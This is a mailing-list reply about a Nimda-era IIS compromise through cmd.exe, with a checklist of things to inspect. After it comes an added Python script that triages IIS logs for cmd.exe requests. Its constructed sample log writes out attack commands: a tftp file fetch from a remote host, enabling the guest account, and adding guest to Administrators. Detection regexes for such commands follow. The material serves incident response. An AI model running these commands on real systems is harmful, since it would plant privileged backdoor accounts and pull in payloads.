> I reckon ZoneAlarm is doing a pretty good job to protect PCs connected to
> the internet.
In this case ZoneAlarm may have blocked the TFTP file transfer
(by doing ingress filtering) but it didn't protect you against
misuse of that cmd.exe.
If you turn IIS back on and fail to correct that problem, someone
can telnet into your system on port 80 and execute shell commands.
Or they can do it via a browser if they're slightly more clever.
ZoneAlarm didn't protect you against this - you yourself observed
this behaviour. Nimda may have failed its attempted FTP - but
you should check for other things that might have been executed
via shell commands that could have left you compromised:
  - users/groups created/modified (like "guest")
  - any admin users
  - any network shares or permissions on them
Sorry to sound like a broken record here. (Is anyone old enough
to even remember what that sounds like?)
-ns
---------------------------------------------------------------------------
New Zealand Delphi Users group - Offtopic List - [EMAIL PROTECTED]
Website: http://www.delphi.org.nz
Web Archive at: http://www.mail-archive.com/offtopic%40delphi.org.nz/
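
Added example, not part of the original post: a small triage script that reads IIS W3C-style log lines, pulls out every request that reached cmd.exe, and sorts the decoded command into the checklist categories from the message above (users, groups, shares, file transfer). The log lines are constructed, the field layout and the "4xx means it did not run" rule are assumptions, and `[...]` stands in for the request path, which the post does not give.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample (assumed fields: date time c-ip method uri-stem uri-query status).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-20 03:11:02 192.0.2.10 GET /scripts/[...]/cmd.exe /c+dir 200
2001-09-20 03:11:09 192.0.2.10 GET /scripts/[...]/cmd.exe /c+tftp+-i+192.0.2.10+GET+[file] 502
2001-09-20 03:14:40 198.51.100.7 GET /scripts/[...]/cmd.exe /c+net+user+guest+/active:yes 200
2001-09-20 03:14:55 198.51.100.7 GET /scripts/[...]/cmd.exe /c+net+localgroup+Administrators+guest+/add 200
2001-09-20 03:15:20 198.51.100.7 GET /scripts/[...]/CMD.EXE /c+net%20share 404
2001-09-20 03:16:00 203.0.113.5 GET /default.htm - 200
"""

# (checklist category, pattern applied to the URL-decoded command line)
CHECKS = [
    ("users", re.compile(r"\bnet1?\s+user\b", re.I)),
    ("groups", re.compile(r"\bnet1?\s+(local)?group\b", re.I)),
    ("shares", re.compile(r"\bnet1?\s+share\b", re.I)),
    ("file transfer", re.compile(r"\bt?ftp\b", re.I)),
]

def triage(log_text):
    """Return one finding per request whose URI stem ends in cmd.exe."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) != 7:
            continue  # header/directive line or unexpected layout
        date, time, ip, _method, stem, query, status = fields
        if not stem.lower().endswith("/cmd.exe"):
            continue
        command = unquote_plus(query)  # '+' and %20 both become spaces
        category = next((n for n, p in CHECKS if p.search(command)), "other")
        findings.append({
            "when": f"{date} {time}", "ip": ip, "command": command,
            "category": category,
            # Assumption: a 4xx status means the request never reached cmd.exe.
            "may_have_run": not status.startswith("4"),
        })
    return findings

def follow_up(findings):
    """Checklist categories that need a manual check on the host."""
    return sorted({f["category"] for f in findings if f["may_have_run"]})

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["when"], f["ip"], f["category"], f["may_have_run"], f["command"])
    print("check on host:", follow_up(triage(SAMPLE_LOG)))
```

Each category returned by `follow_up` maps to one of the manual checks listed in the message; a command logged with a 2xx or 5xx status still has to be verified on the host itself.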